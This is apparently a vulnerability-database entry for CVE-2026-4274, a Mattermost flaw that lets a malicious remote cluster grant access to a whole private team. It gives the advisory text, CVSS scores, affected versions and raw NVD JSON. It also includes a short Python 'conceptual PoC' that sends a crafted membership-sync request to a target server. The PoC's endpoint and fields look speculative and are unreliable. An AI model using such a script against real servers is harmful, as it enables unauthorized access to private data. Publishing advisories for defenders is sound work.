CVE-2026-4274

Description

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to restrict team-level access when processing membership sync from a remote cluster, which allows a malicious remote cluster to grant a user access to an entire private team instead of only the shared channel via sending crafted membership sync messages that trigger team membership assignment. Mattermost Advisory ID: MMSA-2026-00574

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 11.2.x <= 11.2.2

Mattermost 10.11.x <= 10.11.10

Mattermost 11.4.x <= 11.4.0

Mattermost 11.3.x <= 11.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-4274
# This script demonstrates how a malicious cluster might send a crafted sync message.
# Note: Actual exploitation requires a valid cluster setup and acceptance by the target.

import json
import requests

TARGET_HOST = "https://target-mattermost.com"
API_ENDPOINT = f"{TARGET_HOST}/api/v4/cluster/sync_membership"

# Malicious payload crafted to grant full team access
payload = {
    "sender_cluster_id": "malicious-cluster-node",
    "user_id": "target_user_id",
    "team_id": "private_team_id_to_access",
    "channel_ids": [],  # Empty to imply full team sync or bypass channel restriction
    "action": "sync_membership"
}

headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <CLUSTER_TOKEN>" # Requires valid cluster token
}

def send_exploit():
    print(f"[*] Sending crafted membership sync to {TARGET_HOST}...")
    try:
        response = requests.post(API_ENDPOINT, data=json.dumps(payload), headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] Sync request accepted. User may have been added to the private team.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4274/
[4] VulDB https://vuldb.com/cve/CVE-2026-4274
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4274", "sourceIdentifier": "[email protected]", "published": "2026-03-26T11:16:21.257", "lastModified": "2026-03-26T18:48:39.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to restrict team-level access when processing membership sync from a remote cluster, which allows a malicious remote cluster to grant a user access to an entire private team instead of only the shared channel via sending crafted membership sync messages that trigger team membership assignment. Mattermost Advisory ID: MMSA-2026-00574"}, {"lang": "es", "value": "Versiones de Mattermost 11.2.x hasta 11.2.2, 10.11.x hasta 10.11.10, 11.4.x hasta 11.4.0, 11.3.x hasta 11.3.1 no restringen el acceso a nivel de equipo al procesar la sincronización de membresía desde un clúster remoto, lo que permite a un clúster remoto malicioso otorgar a un usuario acceso a un equipo privado completo en lugar de solo al canal compartido mediante el envío de mensajes de sincronización de membresía manipulados que desencadenan la asignación de membresía de equipo. ID de Aviso de Mattermost: MMSA-2026-00574"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.1", "matchCriteriaId": "839BC7B7-28DF-4125-937A-8B0D2D6893C2"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}